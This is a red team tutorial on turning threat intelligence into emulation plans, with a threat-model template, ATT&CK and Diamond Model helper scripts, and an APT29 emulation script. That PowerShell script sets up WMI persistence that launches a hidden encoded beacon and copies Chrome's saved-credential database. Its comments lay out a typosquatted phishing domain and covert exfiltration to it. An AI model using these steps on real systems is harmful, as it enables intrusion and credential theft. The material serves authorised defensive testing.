Threat Intelligence Integration

Planning

Cyber Threat Intelligence (CTI) provides the blueprint for realistic red team operations. By understanding which threat actors target your industry, their TTPs, and their objectives, red teams can design engagements that test defenses against the most relevant threats.

Building a Threat Model

threat-model.md

```markdown
# Threat Model Template for Red Team Planning

## Organization Profile
- Industry: Healthcare
- Revenue: $500M+
- Geographic Presence: US, EU
- Crown Jewels: Patient records (PHI), Payment card data (PCI), Research IP

## Relevant Threat Actors
1. **FIN7** (Carbanak Group)
   - Motivation: Financial gain
   - Targets: POS systems, payment card data
   - TTPs: Phishing with malicious macros, Carbanak backdoor, memory scraping

2. **APT41** (Double Dragon)
   - Motivation: Espionage + Financial
   - Targets: Healthcare IP, pharmaceutical research
   - TTPs: Supply chain compromise, web shells, SQL injection

3. **Conti Ransomware**
   - Motivation: Ransomware/Extortion
   - Targets: Healthcare organizations (high willingness to pay)
   - TTPs: Cobalt Strike beacons, domain dominance, data exfiltration before encryption

## Recommended Emulation
- **Primary:** FIN7 (highest likelihood based on industry targeting patterns)
- **Secondary:** Conti (ransomware is existential risk for healthcare)

## Engagement Objective
Emulate FIN7's attack chain to test detection of payment card data theft:
1. Initial access via phishing (malicious Word doc)
2. Establish C2 beacon (HTTPS to compromised WordPress site)
3. Escalate to domain admin
4. Access POS environment via lateral movement
5. Deploy memory scraper to capture card data
6. Exfiltrate via HTTPS C2 channel
```

Use MITRE ATT&CK for Threat Actors

MITRE ATT&CK maintains profiles for major threat groups listing the techniques each has been observed using. Navigate to the Groups section and filter by your industry to find the adversaries most relevant to your organization.
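The following Python script is an added example, not code from the original page: it takes the prioritized actors from a threat model like the template above, scores each ATT&CK technique by the likelihood weight of the actors that use it, and returns the highest-scoring techniques the blue team has no tested detection for, which is a practical way to decide which steps of the engagement objective matter most. The actor-to-technique sets, the likelihood weights and the `DETECTED` coverage set are constructed for illustration and are not copied from ATT&CK's group pages; only the technique IDs are real ATT&CK identifiers.

```python
"""Rank ATT&CK techniques for red team scoping from a CTI-derived threat model.

All actor/technique data below is constructed for illustration (not taken from
ATT&CK group pages); only the T-number identifiers are real ATT&CK technique IDs.
"""
from collections import Counter

# Constructed: likelihood weights for the actors chosen in the threat model
# (integers rather than floats so scores compare exactly).
ACTOR_WEIGHT = {"FIN7": 10, "Conti": 8, "APT41": 5}

# Constructed: illustrative technique sets per actor.
ACTOR_TECHNIQUES = {
    "FIN7": {"T1566.001", "T1204.002", "T1059.001", "T1071.001", "T1005", "T1041"},
    "Conti": {"T1566.001", "T1059.001", "T1071.001", "T1021", "T1003", "T1041", "T1486"},
    "APT41": {"T1195", "T1190", "T1505.003", "T1059.001", "T1071.001", "T1003"},
}

# Constructed: techniques the defenders already have a tested detection for.
DETECTED = {"T1566.001", "T1486"}


def technique_scores(actor_weight, actor_techniques):
    """Score each technique by the summed weight of every actor that uses it."""
    scores = Counter()
    for actor, techniques in actor_techniques.items():
        weight = actor_weight.get(actor, 0)
        for technique in techniques:
            scores[technique] += weight
    return dict(scores)


def shared_techniques(actor_techniques, min_actors=2):
    """Techniques used by at least `min_actors` of the modelled actors.

    These give the best return on a single detection test because one
    emulated step exercises defenses against several relevant adversaries.
    """
    counts = Counter(t for techniques in actor_techniques.values() for t in techniques)
    return {t for t, n in counts.items() if n >= min_actors}


def prioritize(actor_weight, actor_techniques, detected, top_n=5):
    """Return up to `top_n` (technique, score) pairs with no tested detection,
    highest score first; ties are broken by technique ID for stable output."""
    scores = technique_scores(actor_weight, actor_techniques)
    gaps = [(t, s) for t, s in scores.items() if t not in detected]
    gaps.sort(key=lambda pair: (-pair[1], pair[0]))
    return gaps[:top_n]


def coverage(actor, actor_techniques, detected):
    """Fraction of one actor's techniques that already have a tested detection."""
    techniques = actor_techniques[actor]
    return len(techniques & detected) / len(techniques)


if __name__ == "__main__":
    print("Techniques shared by 2+ modelled actors:", sorted(shared_techniques(ACTOR_TECHNIQUES)))
    print("Top detection gaps to emulate:")
    for technique, score in prioritize(ACTOR_WEIGHT, ACTOR_TECHNIQUES, DETECTED):
        print(f"  {technique}  score={score}")
    for actor in ACTOR_TECHNIQUES:
        print(f"Detection coverage for {actor}: {coverage(actor, ACTOR_TECHNIQUES, DETECTED):.0%}")
```

Replace the constructed sets with the technique lists from the ATT&CK group pages for your chosen actors and the `DETECTED` set with your own tested-detection inventory; the ranking then reflects your real gaps rather than the illustrative ones.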

CTI Sources for Red Teams

🌐 MITRE ATT&CK

Free, comprehensive database of adversary tactics and techniques with group profiles.

📊 Mandiant/FireEye Reports

Detailed APT analysis, plus the annual M-Trends reports that summarize attacker trends observed in incident response engagements.

🔍 CISA Alerts

Government advisories on active threat campaigns targeting specific sectors.

💰 Commercial TI Platforms

Recorded Future, CrowdStrike Falcon Intelligence, Anomali - curated threat actor profiles.

Translating CTI to Red Team TTPs

Example: Emulating APT29's credential theft campaign

CTI Report Findings

  • APT29 uses spearphishing with malicious links to Microsoft Office documents hosted on OneDrive
  • Payload: Cobalt Strike beacon delivered via HTA file
  • Persistence: WMI event subscriptions
  • Credential theft: PowerShell script to extract Chrome passwords and cookies
  • C2: HTTPS to legitimate-looking domains registered days before campaign

Red Team Implementation

apt29-emulation.ps1

```powershell
# 1. Phishing Infrastructure
#   - Register domain: customer-portal-update[.]com (typosquatting)
#   - Host malicious HTA on legitimate file-sharing service (OneDrive, Dropbox)
#   - Craft spearphish: "Action Required: Update Your Credentials"

# 2. Initial Access
#   - Target: Finance team (high-value targets)
#   - Payload: HTA file that downloads and executes Cobalt Strike beacon
#   - C2: HTTPS to customer-portal-update[.]com (domain fronting via Cloudflare)

# 3. Persistence
# Create WMI event subscription for daily callback
$FilterArgs = @{name='WindowsUpdate'; EventNameSpace='root\CimV2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour=14"}
$Filter = New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs

$ConsumerArgs = @{name='WindowsUpdate'; CommandLineTemplate='powershell.exe -NoP -W Hidden -Enc <base64_beacon>'}
$Consumer = New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs

$BindingArgs = @{Filter=$Filter; Consumer=$Consumer}
New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $BindingArgs

# 4. Credential Theft (Chrome cookies/passwords)
# Use SharpChromium or manual extraction
$ChromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
Copy-Item "$ChromePath\Login Data" -Destination "$env:TEMP\ChromeCreds.db"
# Exfiltrate via C2

# 5. Covert Exfiltration
# Rate-limit to 100KB/hour to avoid network anomaly detection
# Use HTTPS POST to customer-portal-update[.]com/api/sync
```

Diamond Model for Red Team Planning

The Diamond Model maps the relationships between four vertices of an intrusion event: Adversary, Capability, Infrastructure, and Victim. Use it to plan engagements by reproducing each vertex of the adversary you are emulating:

Adversary

APT29 (Cozy Bear) - Russian state-sponsored

Capability

Cobalt Strike beacon, WMI persistence, credential theft

Infrastructure

Typosquatted domains, Cloudflare domain fronting, OneDrive

Victim

Government agencies, think tanks, financial services
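As an added example (not from the original page), the Python below models Diamond events as records with the four vertices plus a phase label, and shows the two operations a planner actually performs on them: pivoting from a known value on one vertex to the linked values on another (for example, which capabilities were seen with a given piece of infrastructure), and assembling one adversary's events into an ordered emulation plan. The sample events are constructed for illustration from the vertex values listed above and are not taken from a CTI feed.

```python
"""Diamond Model events with pivot and emulation-plan helpers (illustrative)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class DiamondEvent:
    """One intrusion event: the four Diamond vertices plus a phase label."""
    adversary: str
    capability: str
    infrastructure: str
    victim: str
    phase: str  # e.g. "delivery", "persistence", "c2"


VERTICES = ("adversary", "capability", "infrastructure", "victim")

# Constructed sample events for illustration; not from a real CTI feed.
EVENTS = [
    DiamondEvent("APT29", "spearphish link to HTA", "OneDrive", "think tank", "delivery"),
    DiamondEvent("APT29", "Cobalt Strike beacon", "typosquatted domain", "think tank", "c2"),
    DiamondEvent("APT29", "WMI event subscription", "typosquatted domain", "government agency", "persistence"),
    DiamondEvent("FIN7", "macro document", "compromised WordPress site", "retailer", "delivery"),
    DiamondEvent("FIN7", "Carbanak backdoor", "compromised WordPress site", "retailer", "c2"),
]


def pivot(events, vertex, value):
    """Return every event whose `vertex` equals `value` (the basic Diamond pivot)."""
    if vertex not in VERTICES:
        raise ValueError(f"unknown vertex {vertex!r}; expected one of {VERTICES}")
    return [e for e in events if getattr(e, vertex) == value]


def related(events, vertex, value, target):
    """Sorted values of `target` that co-occur with (`vertex`, `value`) in any event.

    Example: related(EVENTS, "infrastructure", "typosquatted domain", "capability")
    answers "what capabilities has this infrastructure class been paired with?"
    """
    if target not in VERTICES:
        raise ValueError(f"unknown target vertex {target!r}")
    return sorted({getattr(e, target) for e in pivot(events, vertex, value)})


def emulation_plan(events, adversary, phase_order=("delivery", "persistence", "c2")):
    """Order one adversary's events by phase, giving the red team the
    (phase, capability, infrastructure) triples it must reproduce."""
    rank = {phase: i for i, phase in enumerate(phase_order)}
    own = pivot(events, "adversary", adversary)
    own.sort(key=lambda e: rank.get(e.phase, len(rank)))  # unknown phases go last
    return [(e.phase, e.capability, e.infrastructure) for e in own]


if __name__ == "__main__":
    print(related(EVENTS, "infrastructure", "typosquatted domain", "capability"))
    print(related(EVENTS, "victim", "think tank", "adversary"))
    for step in emulation_plan(EVENTS, "APT29"):
        print(step)
```

The pivot functions are the part worth keeping: once events from real CTI reports are loaded, pivoting on the Victim vertex with your own sector tells you which adversaries to model, and pivoting on those adversaries returns the capability and infrastructure vertices the engagement has to reproduce.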

Update Threat Model Quarterly

Threat landscapes evolve. Update your threat model every 3-6 months based on new CTI reports, emerging threat groups, and industry-specific campaigns, and re-check which of the previously emulated techniques now have working detections.